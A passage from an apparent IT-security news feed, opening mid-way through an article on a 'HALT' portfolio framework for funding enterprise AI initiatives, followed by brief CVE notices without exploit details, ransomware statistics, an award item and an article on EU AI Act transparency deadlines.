<p class="wp-block-paragraph">Read as a technology story, these numbers say AI does not work. Read correctly, they say something more useful. MIT’s own authors located the cause not in model quality but in a <a href="https://virtualizationreview.com/articles/2025/08/19/mit-report-finds-most-ai-business-investments-fail-reveals-genai-divide.aspx">learning and integration gap</a>. The winners were not running better models. They picked one problem, executed and worked well together. Purchased solutions reached production about 67 percent of the time, while internal builds succeeded roughly a third as often. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-03-31-gartner-forecasts-worldwide-genai-spending-to-reach-644-billion-in-2025">Gartner’s own spending forecast</a> notes the same pivot, with CIOs scaling back ambitious internal builds in favor of commercial solutions that promise more predictable value. None of that is a verdict on the technology. It is a verdict on allocation: What gets funded, for how long and against which yardstick. The popular prescription, heard in every boardroom this year, is to measure harder and prove value sooner. That advice quietly repeats the mistake, because forcing a three-year bet to prove itself sooner is precisely how you kill it. The fix is not more measurement. It is measuring each bet against the right clock and subtracting the ones that miss.</p>



<h2 class="wp-block-heading">The six-month cycle problem</h2>



<p class="wp-block-paragraph">Return to that 95 percent, because the way it is measured is the whole argument. Much of the reported failure is judged on a short clock, with a pilot counted as a failure if it has not shown a measurable financial return within roughly six months. The single most quoted number in enterprise AI is therefore a six-month yardstick applied to every initiative, including the bets designed to pay back in three years. The headline failure rate is not only a measure of AI. It is a measure of impatience.</p>



<p class="wp-block-paragraph">The most expensive mistake in enterprise AI is a timing error. Enterprises have been spending heavily on AI for more than two years, and 2026 is the year boards are demanding returns. The multi-year bets funded during the 2024 and 2025 scale-up are only now far enough along to be judged. When a board reviews an initiative, it applies the yardstick it knows, which is quarterly return. That yardstick is correct for an efficiency project and ruinous for a capability bet. A workflow automation that should pay back in two quarters and a foundational data and agent capability that pays back in three years are not the same instrument, yet they are reviewed in the same meeting against the same metric.</p>



<p class="wp-block-paragraph">This is the heart of the divide. The 5 percent did not simply pick better projects. They judged each project against its own horizon. McKinsey’s enduring <a href="https://www.mckinsey.com/capabilities/strategy-and-corporate-finance/our-insights/enduring-ideas-the-three-horizons-of-growth">Three Horizons model</a> made this discipline standard in corporate strategy a generation ago: near-term, emerging and long-term bets are funded and measured differently. AI erased that discipline because the hype compressed every timeline into the current quarter. The result is two failure modes that appear opposite yet share a common root. Organizations kill three-year bets at month six because they miss a metric the bet was never designed to hit. And they keep funding six-month theater for years because it is visible, safe and never asked to prove a return. Both are allocation failures. Neither is a technology failure.</p>



<h2 class="wp-block-heading">Subtraction is a strategy</h2>



<p class="wp-block-paragraph">There is a second discipline, the 5 percent share, and it is the one boards find hardest. They subtract. Every credible study of the failure rate describes the same chaotic pattern underneath it: Initiatives are <a href="https://www.ciodive.com/news/AI-project-fail-data-SPGlobal/742590/">abandoned late, without criteria</a>, after the money is spent and the credibility is gone. Disciplined organizations do the opposite. They decide the conditions for stopping before they start, and they stop on schedule. Subtraction is not the absence of strategy. It is the strategy. Capital removed from a failing bet is capital available for a surviving one, and the survivors are where the entire return lives.</p>



<p class="wp-block-paragraph">This reframes the 42 percent abandonment figure. Abandonment is not the problem. Undisciplined abandonment is. An organization that liquidates a position the moment it breaches a pre-agreed kill line is practicing portfolio hygiene. An organization that lets a doomed pilot run until someone loses patience is paying full price for a lesson it could have bought at a discount. The 5 percent who won were not smarter. They were patient in the right places and ruthless in the wrong ones.</p>



<h2 class="wp-block-heading">The HALT framework: Horizon, Allocation, Liquidation, Tracking</h2>



<p class="wp-block-paragraph">Treating AI as a portfolio rather than a pile of pilots requires four disciplines, and the organizations that execute well put all four in place before the next funding cycle, not after the next failure. The name is deliberate. The discipline most enterprises lack is the willingness to halt the wrong bets in time to fund the right ones.</p>



<p class="wp-block-paragraph"><strong>Component 1: Horizon. </strong>Classify every AI initiative by its true payoff horizon before it is funded. Horizon 1 covers efficiency plays that should return value within two quarters. Horizon 2 covers capability bets, data foundations, agent platforms and integration work that pays back in roughly 6 to 18 months. Horizon 3 covers transformation bets that take eighteen months to three years or longer. Each horizon carries its own success metric, set at funding time. A Horizon 1 yardstick never judges a Horizon 3 bet. This single rule prevents the most common and most expensive error in the portfolio.</p>



<p class="wp-block-paragraph"><strong>Component 2: Allocation. </strong>Decide the split across horizons deliberately, as a board-level capital decision, not as the accidental sum of whatever pilots happened to win approval. A practical reference point, borrowed from decades of innovation-portfolio practice, is roughly 70% to near-term value, 20% to capability, and 10% to transformation. The exact ratio is yours; the discipline is to choose and defend it. The failure mode is an unmanaged portfolio: 90 percent scattered across disconnected Horizon 1 experiments, with nothing compounding into the Horizon 2 capability that the buy-and-integrate winners actually built.</p>



<p class="wp-block-paragraph"><strong>Component 3: Liquidation. </strong>Attach a kill line to every initiative at the moment it is funded: A named milestone, a date and an owner empowered to stop it. If a bet misses its horizon-appropriate milestone, it is liquidated, and capital is reallocated on schedule without debate over sunk costs. The absence of a pre-agreed kill line is not patience. It is an unpriced liability that the board has almost certainly not been shown.</p>



<p class="wp-block-paragraph"><strong>Component 4: Tracking. </strong>Report the portfolio to the board on a fixed cadence using a single instrument: The AI Portfolio Scorecard. Not a deck of project updates, but a single view of allocation by horizon, burn against milestone, liquidation decisions taken and capital reallocated to survivors. The cadence is the control. A portfolio reviewed once a year is a portfolio managed by hope.</p>



<p class="wp-block-paragraph"><strong>THE AI PORTFOLIO SCORECARD: SCORE EVERY INITIATIVE BEFORE IT IS FUNDED</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Evaluation criterion</strong></td><td><strong>0</strong></td><td><strong>1</strong></td><td><strong>2</strong></td></tr></thead><tbody><tr><td>Horizon assigned (H1 / H2 / H3) and documented before funding</td><td> </td><td> </td><td> </td></tr><tr><td>Success metric matched to the horizon, not a default quarterly ROI</td><td> </td><td> </td><td> </td></tr><tr><td>Kill line set: Named milestone and date, agreed at funding</td><td> </td><td> </td><td> </td></tr><tr><td>Owner named with explicit authority to stop the initiative</td><td> </td><td> </td><td> </td></tr><tr><td>Fits a deliberate allocation band, not an accidental addition</td><td> </td><td> </td><td> </td></tr><tr><td>Odds-raising path documented: Buy or partner and an integration plan</td><td> </td><td> </td><td> </td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>Score each criterion: 0 = not present, 1 = partially documented, 2 = fully verified. Total out of 12. Bands: 0 to 4 = DO NOT FUND  |  5 to 8 = CONDITIONAL  |  9 to 12 = FUND.</em></p>



<p class="wp-block-paragraph"><strong>THE LIQUIDATION GATE: RUN AT EVERY BOARD REVIEW BEFORE CONTINUING FUNDING</strong></p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Review test</strong></td><td><strong>Status</strong></td></tr></thead><tbody><tr><td>Milestone for this horizon met or credibly on track</td><td>PASS / FAIL</td></tr><tr><td>Burn within plan to the next milestone</td><td>PASS / FAIL</td></tr><tr><td>Still fits the allocation band, with no quiet horizon drift</td><td>PASS / FAIL</td></tr><tr><td>Owner confirms continued strategic fit</td><td>PASS / FAIL</td></tr></tbody></table> </div></figure>



<p class="wp-block-paragraph"><em>Any unresolved FAIL = stop funding, liquidate the position, reallocate the capital to a survivor and record the decision on the scorecard.</em></p>



<h2 class="wp-block-heading">The cost of the timing error</h2>



<p class="wp-block-paragraph">The financial case follows the pattern and is consistent. Consider two organizations that funded the same class of Horizon 3 bet: A domain-specific agent platform meant to compound over three years. The first review was conducted at month six against a quarterly return test, found no payback and killed it, booking the write-off as a lesson about AI being overhyped. Its competitor classified the same work as Horizon 3, set an 18-month capability milestone, protected funding through two review cycles and shipped to production within the window the work actually required. One organization spent its money to learn that it lacks allocation discipline. The other spent comparable money and now owns a capability its rival has abandoned and cannot quickly rebuild. The dollars on the two income statements are similar. The competitive positions are not.</p>



<h2 class="wp-block-heading">The governance return the board has been waiting for</h2>



<p class="wp-block-paragraph">Allocation discipline does two things at once. It stops the bleed by liquidating failures on a schedule rather than at the point of exhaustion. And it concentrates capital where the entire return lives, in the small number of bets that survive their horizon. The 5 percent figure is not a ceiling imposed by the technology. It is the current yield of an industry allocated by hype. An organization that classifies by horizon, allocates on purpose, liquidates on a line and tracks on a cadence is not trying to beat the technology. It is trying to beat its own indiscipline, and that is a far more winnable contest.</p>



<p class="wp-block-paragraph">The board conversation about AI returns is coming for every organization, and it arrives the moment the spending outpaces the story. When it does, the CIO will be asked a simple question: Where did the money go? The leaders who can answer will not show a pile of pilots. They will show a portfolio: What was funded, against which horizon, what was liquidated and when, and what the survivors are now worth. Subtraction is a strategy. The only question is whether you are practicing it on purpose or about to learn it by accident.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15145 | wpdevteam Essential Addons for Elementor Plugin up to 6.6.11 on WordPress Fancy Text Widget cross site scripting (EUVD-2026-46166)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in wpdevteam Essential Addons for Elementor Plugin up to 6.6.11 on WordPress. This vulnerability affects unknown code of the component Fancy Text Widget. Performing a manipulation results in cross site scripting.

This vulnerability was ...]]></description>
<link>https://tsecurity.de/de/3683447/sicherheitsluecken/cve-2026-15145-wpdevteam-essential-addons-for-elementor-plugin-up-to-6611-on-wordpress-fancy-text-widget-cross-site-scripting-euvd-2026-46166/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683447/sicherheitsluecken/cve-2026-15145-wpdevteam-essential-addons-for-elementor-plugin-up-to-6611-on-wordpress-fancy-text-widget-cross-site-scripting-euvd-2026-46166/</guid>
<pubDate>Tue, 21 Jul 2026 12:56:19 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/wpdevteam:essential_addons_for_elementor_plugin">wpdevteam Essential Addons for Elementor Plugin up to 6.6.11</a> on WordPress. This vulnerability affects unknown code of the component <em>Fancy Text Widget</em>. Performing a manipulation results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-15145">CVE-2026-15145</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware Groups Claim Record 7,551 Victims as Qilin Activity Jumps 443%]]></title>
<description><![CDATA[Ransomware groups publicly named 7,551 victims from April 2025 through March 2026, a 24.9% rise from the previous reporting period. The surge was led by Qilin, which claimed 1,358 victims up 443% year over year while the broader ecosystem expanded to 146 active groups by June 2026. The figures re...]]></description>
<link>https://tsecurity.de/de/3683433/it-security-nachrichten/ransomware-groups-claim-record-7551-victims-as-qilin-activity-jumps-443/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683433/it-security-nachrichten/ransomware-groups-claim-record-7551-victims-as-qilin-activity-jumps-443/</guid>
<pubDate>Tue, 21 Jul 2026 12:54:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Ransomware groups publicly named 7,551 victims from April 2025 through March 2026, a 24.9% rise from the previous reporting period. The surge was led by Qilin, which claimed 1,358 victims up 443% year over year while the broader ecosystem expanded to 146 active groups by June 2026. The figures reflect publicly disclosed or leak-site claims […]</p>
<p>The post <a href="https://cyberpress.org/qilin-fuels-record-ransomware-victims/">Ransomware Groups Claim Record 7,551 Victims as Qilin Activity Jumps 443%</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15782 | smub WPForms Plugin up to 2.0.0.1 on WordPress Post Content data-sitekey cross site scripting (EUVD-2026-46155)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in smub WPForms Plugin up to 2.0.0.1 on WordPress. Affected is an unknown function of the component Post Content. The manipulation of the argument data-sitekey results in cross site scripting.

This vulnerability was named CVE-2026-15...]]></description>
<link>https://tsecurity.de/de/3683149/sicherheitsluecken/cve-2026-15782-smub-wpforms-plugin-up-to-2001-on-wordpress-post-content-data-sitekey-cross-site-scripting-euvd-2026-46155/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683149/sicherheitsluecken/cve-2026-15782-smub-wpforms-plugin-up-to-2001-on-wordpress-post-content-data-sitekey-cross-site-scripting-euvd-2026-46155/</guid>
<pubDate>Tue, 21 Jul 2026 11:12:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/smub:wpforms_plugin">smub WPForms Plugin up to 2.0.0.1</a> on WordPress. Affected is an unknown function of the component <em>Post Content</em>. The manipulation of the argument <em>data-sitekey</em> results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-15782">CVE-2026-15782</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Eye on the Sky: SkySafe Named 2026 Golden Eagle Award Winner]]></title>
<description><![CDATA[This year Security Magazine partnered with The National Center for Spectator Sports Safety and Security (NCS4) to present the Golden Eagle Award to SkySafe as the 2026 Golden Eagle Award winner for its case study submission, “University of Illinois Sets the Standard for Campus Drone Security.”]]></description>
<link>https://tsecurity.de/de/3683137/it-security-nachrichten/eye-on-the-sky-skysafe-named-2026-golden-eagle-award-winner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683137/it-security-nachrichten/eye-on-the-sky-skysafe-named-2026-golden-eagle-award-winner/</guid>
<pubDate>Tue, 21 Jul 2026 11:10:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This year Security Magazine partnered with The National Center for Spectator Sports Safety and Security (NCS4) to present the Golden Eagle Award to SkySafe as the 2026 Golden Eagle Award winner for its case study submission, “University of Illinois Sets the Standard for Campus Drone Security.”]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-63925 | Linux Kernel up to 7.0.11 Macsec macsec_post_decrypt authentication replay (Nessus ID 328316)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Linux Kernel up to 7.0.11. This affects the function macsec_post_decrypt of the component Macsec. The manipulation results in authentication bypass by capture-replay.

This vulnerability was named CVE-2026-63925. The attack may be perfo...]]></description>
<link>https://tsecurity.de/de/3682896/sicherheitsluecken/cve-2026-63925-linux-kernel-up-to-7011-macsec-macsecpostdecrypt-authentication-replay-nessus-id-328316/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682896/sicherheitsluecken/cve-2026-63925-linux-kernel-up-to-7011-macsec-macsecpostdecrypt-authentication-replay-nessus-id-328316/</guid>
<pubDate>Tue, 21 Jul 2026 09:09:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/linux:kernel">Linux Kernel up to 7.0.11</a>. This affects the function <code>macsec_post_decrypt</code> of the component <em>Macsec</em>. The manipulation results in authentication bypass by capture-replay.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-63925">CVE-2026-63925</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-8598 | ZKTeco SSC335-GC2063-Face-0b77 Solution Camera prior 5.0.1.2.20260421 authentication bypass]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in ZKTeco SSC335-GC2063-Face-0b77 Solution Camera. Affected by this issue is some unknown functionality. Performing a manipulation results in authentication bypass using alternate channel.

This vulnerability was named CVE-2026-8598. The attack...]]></description>
<link>https://tsecurity.de/de/3682847/sicherheitsluecken/cve-2026-8598-zkteco-ssc335-gc2063-face-0b77-solution-camera-prior-501220260421-authentication-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682847/sicherheitsluecken/cve-2026-8598-zkteco-ssc335-gc2063-face-0b77-solution-camera-prior-501220260421-authentication-bypass/</guid>
<pubDate>Tue, 21 Jul 2026 08:39:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/zkteco:ssc335-gc2063-face-0b77_solution_camera">ZKTeco SSC335-GC2063-Face-0b77 Solution Camera</a>. Affected by this issue is some unknown functionality. Performing a manipulation results in authentication bypass using alternate channel.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-8598">CVE-2026-8598</a>. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-22518 | Atlassian Confluence Data Center/Confluence Server improper authorization (WID-SEC-2026-1608)]]></title>
<description><![CDATA[A vulnerability was found in Atlassian Confluence Data Center and Confluence Server. It has been rated as critical. This issue affects some unknown processing. Performing a manipulation results in improper authorization.

This vulnerability was named CVE-2023-22518. The attack may be initiated re...]]></description>
<link>https://tsecurity.de/de/3682760/sicherheitsluecken/cve-2023-22518-atlassian-confluence-data-centerconfluence-server-improper-authorization-wid-sec-2026-1608/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682760/sicherheitsluecken/cve-2023-22518-atlassian-confluence-data-centerconfluence-server-improper-authorization-wid-sec-2026-1608/</guid>
<pubDate>Tue, 21 Jul 2026 07:38:41 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/atlassian:confluence_data_center">Atlassian Confluence Data Center and Confluence Server</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing. Performing a manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2023-22518">CVE-2023-22518</a>. The attack may be initiated remotely. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-39603 | ThemeGoods Grand Photography Plugin up to 5.7.8 on WordPress cross-site request forgery]]></title>
<description><![CDATA[A vulnerability was found in ThemeGoods Grand Photography Plugin up to 5.7.8 on WordPress and classified as problematic. This impacts an unknown function. The manipulation results in cross-site request forgery.

This vulnerability was named CVE-2026-39603. The attack may be performed from remote....]]></description>
<link>https://tsecurity.de/de/3682593/sicherheitsluecken/cve-2026-39603-themegoods-grand-photography-plugin-up-to-578-on-wordpress-cross-site-request-forgery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682593/sicherheitsluecken/cve-2026-39603-themegoods-grand-photography-plugin-up-to-578-on-wordpress-cross-site-request-forgery/</guid>
<pubDate>Tue, 21 Jul 2026 05:09:56 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/themegoods:grand_photography_plugin">ThemeGoods Grand Photography Plugin up to 5.7.8</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function. The manipulation results in cross-site request forgery.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-39603">CVE-2026-39603</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2019-13990 | Oracle Documaker up to 12.6.4 Terracotta Quartz Scheduler xml external entity reference (Nessus ID 210560 / WID-SEC-2026-1608)]]></title>
<description><![CDATA[A vulnerability categorized as very critical has been discovered in Oracle Documaker 12.6.0/12.6.1/12.6.2/12.6.3/12.6.4. Affected by this issue is some unknown functionality of the component Terracotta Quartz Scheduler. The manipulation results in xml external entity reference.

This vulnerabilit...]]></description>
<link>https://tsecurity.de/de/3682563/sicherheitsluecken/cve-2019-13990-oracle-documaker-up-to-1264-terracotta-quartz-scheduler-xml-external-entity-reference-nessus-id-210560-wid-sec-2026-1608/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682563/sicherheitsluecken/cve-2019-13990-oracle-documaker-up-to-1264-terracotta-quartz-scheduler-xml-external-entity-reference-nessus-id-210560-wid-sec-2026-1608/</guid>
<pubDate>Tue, 21 Jul 2026 04:25:36 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">very critical</a> has been discovered in <a href="https://vuldb.com/product/oracle:documaker">Oracle Documaker 12.6.0/12.6.1/12.6.2/12.6.3/12.6.4</a>. Affected by this issue is some unknown functionality of the component <em>Terracotta Quartz Scheduler</em>. The manipulation results in xml external entity reference.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2019-13990">CVE-2019-13990</a>. The attack may be performed from remote. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-5677 | Totolink A7100RU 7.4cu.2313_b20191024 /cgi-bin/cstecgi.cgi CsteSystem resetFlags os command injection]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Totolink A7100RU 7.4cu.2313_b20191024. Impacted is the function CsteSystem of the file /cgi-bin/cstecgi.cgi. Performing a manipulation of the argument resetFlags results in os command injection.

This vulnerability was named CVE...]]></description>
<link>https://tsecurity.de/de/3682548/sicherheitsluecken/cve-2026-5677-totolink-a7100ru-74cu2313b20191024-cgi-bincstecgicgi-cstesystem-resetflags-os-command-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682548/sicherheitsluecken/cve-2026-5677-totolink-a7100ru-74cu2313b20191024-cgi-bincstecgicgi-cstesystem-resetflags-os-command-injection/</guid>
<pubDate>Tue, 21 Jul 2026 04:25:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/totolink:a7100ru">Totolink A7100RU 7.4cu.2313_b20191024</a>. Impacted is the function <code>CsteSystem</code> of the file <em>/cgi-bin/cstecgi.cgi</em>. Performing a manipulation of the argument <em>resetFlags</em> results in os command injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-5677">CVE-2026-5677</a>. The attack may be initiated remotely. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-57834 | Samsung Mobile Processor/Wearable Processor/Modem Exynos up to 9110 denial of service]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Samsung Mobile Processor, Wearable Processor and Modem Exynos up to 9110. Affected by this issue is some unknown functionality. Performing a manipulation results in denial of service.

This vulnerability was named CVE-2025-57834. The atta...]]></description>
<link>https://tsecurity.de/de/3682547/sicherheitsluecken/cve-2025-57834-samsung-mobile-processorwearable-processormodem-exynos-up-to-9110-denial-of-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682547/sicherheitsluecken/cve-2025-57834-samsung-mobile-processorwearable-processormodem-exynos-up-to-9110-denial-of-service/</guid>
<pubDate>Tue, 21 Jul 2026 04:25:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/samsung:mobile_processor">Samsung Mobile Processor, Wearable Processor and Modem Exynos up to 9110</a>. Affected by this issue is some unknown functionality. Performing a manipulation results in denial of service.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2025-57834">CVE-2025-57834</a>. The attack needs to be approached within the local network. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-48651 | Google Android privilege escalation]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Google Android. This affects an unknown function. The manipulation results in privilege escalation.

This vulnerability was named CVE-2025-48651. The attack needs to be approached within the local network. There is no available exploit.

It...]]></description>
<link>https://tsecurity.de/de/3682546/sicherheitsluecken/cve-2025-48651-google-android-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682546/sicherheitsluecken/cve-2025-48651-google-android-privilege-escalation/</guid>
<pubDate>Tue, 21 Jul 2026 04:25:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/google:android">Google Android</a>. This affects an unknown function. The manipulation results in privilege escalation.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2025-48651">CVE-2025-48651</a>. The attack needs to be approached within the local network. There is no available exploit.

It is best practice to apply a patch to resolve this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[The EU’s AI transparency deadline is weeks away. Is your enterprise ready?]]></title>
<description><![CDATA[Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.



To assist in the effort, the European Commission (Commission) has published guidelines to help AI deployers get in line with the AI Act’...]]></description>
<link>https://tsecurity.de/de/3682527/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682527/it-nachrichten/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready/</guid>
<pubDate>Tue, 21 Jul 2026 04:02:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Providers and deployers of AI systems: You only have a couple of weeks left until you must explicitly inform users when they are interacting with AI content.</p>



<p class="wp-block-paragraph">To assist in the effort, the European Commission (Commission) has published <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1653" target="_blank" rel="noreferrer noopener">guidelines</a> to help AI deployers get in line with the AI Act’s transparency obligations, which will begin to go into effect on August 2.</p>



<p class="wp-block-paragraph">After that, companies providing AI systems must alert users when they are interacting with AI. They must also tell users when they have been exposed to deepfakes, “emotion recognition,” or biometric categorization systems, or when they are given AI-manipulated content in matters of “public interests without human review or editorial control.”</p>



<p class="wp-block-paragraph"><a href="https://commission.europa.eu/about/organisation/college-commissioners/henna-virkkunen_en" target="_blank" rel="noreferrer noopener">Henna Virkkunen</a>, the Commission’s executive VP for tech sovereignty, security and democracy, said in a statement, “with today’s guidelines, the Commission supports the smooth and effective application of the AI Act to make AI systems interacting with people such as chatbots and AI agents and AI content more transparent and trustworthy. These guidelines support providers and deployers in meeting their obligations under the AI Act, while helping citizens know when they are interacting with AI.”</p>



<p class="wp-block-paragraph">Systems must include machine-readable markers to reveal such content, to reduce “the risk of deception and manipulation” and build public trust in AI.</p>



<p class="wp-block-paragraph">“Generative systems have collapsed the cost of producing convincing content while the cost of judging it stands where it always stood,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. This requirement is “an attempt to restore friction to that imbalance.”</p>



<p class="wp-block-paragraph">A company’s non-compliance could result in fines anywhere from €750K (about $856K) to €15M (about $17 million), or even up to 3% of its total worldwide annual revenue.</p>



<h2 class="wp-block-heading">Transparency requirements</h2>



<p class="wp-block-paragraph">The <a href="https://www.cio.com/article/2096040/what-it-leaders-need-to-know-about-the-eu-ai-act.html" target="_blank">EU AI Act’s</a> transparency requirements apply to “natural or legal persons,” public authorities, agencies, or other bodies that develop AI systems, or have them developed, and place them on the EU market or into use under their name or trademark. This means all companies, regardless of whether or not they are EU-based.</p>



<p class="wp-block-paragraph">“Systems placed on the European market, put into service there, or producing outputs used there are inside the field, wherever the developer sits,” Gogia noted.</p>



<p class="wp-block-paragraph">Applicable systems must be intended to interact directly with “natural persons”; these systems include AI-enabled chatbots or conversational agents, AI companions, or coding agents. However, AI-enabled tools like recommender systems, spam filters, authentication, search and retrieval, transcription, text and code auto-completion, or predictive maintenance do not fall under the rule.</p>



<p class="wp-block-paragraph">Specific outputs such as AI-generated text, images, video, and audio must contain a machine-readable mark. Deepfakes and public interest-related text created by AI without human review or control must be clearly labeled, however, deepfake content that is “artistic, creative, satirical, or fictional” is largely exempt.</p>



<p class="wp-block-paragraph">AI content must be marked with one of three labels: “AI,” “Fully AI-generated,” or “Partially AI-modified.” For instance, “Fully AI-generated” applies when news summaries, music, art, or videos have been created without any human oversight (apart from prompting), while “partially AI-modified” could mean a person’s face is swapped into an authentic photograph to create a deepfake.</p>



<p class="wp-block-paragraph">The three icons are publicly available for free use; enterprises can download zip files in <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129547" target="_blank" rel="noreferrer noopener">PNG</a> and <a href="https://ec.europa.eu/newsroom/dae/redirection/document/129546" target="_blank" rel="noreferrer noopener">SVG</a> formats.</p>



<p class="wp-block-paragraph">Most of the <a href="https://www.cio.com/article/4032894/analysis-of-the-european-ai-regulation-one-year-after-its-entry-into-force.html" target="_blank">Act’s transparency rules</a> begin to go into effect on August 2. But AI systems placed on the market before then will have some leeway; they must be in compliance by December 2.</p>



<p class="wp-block-paragraph">However, a four-month allowance “on one obligation, for one population of systems, contingent on one procedural step, is not a strategy,” Gogia emphasized. Enterprises should plan to comply by August 2 and “treat any relief that arrives as margin.”</p>



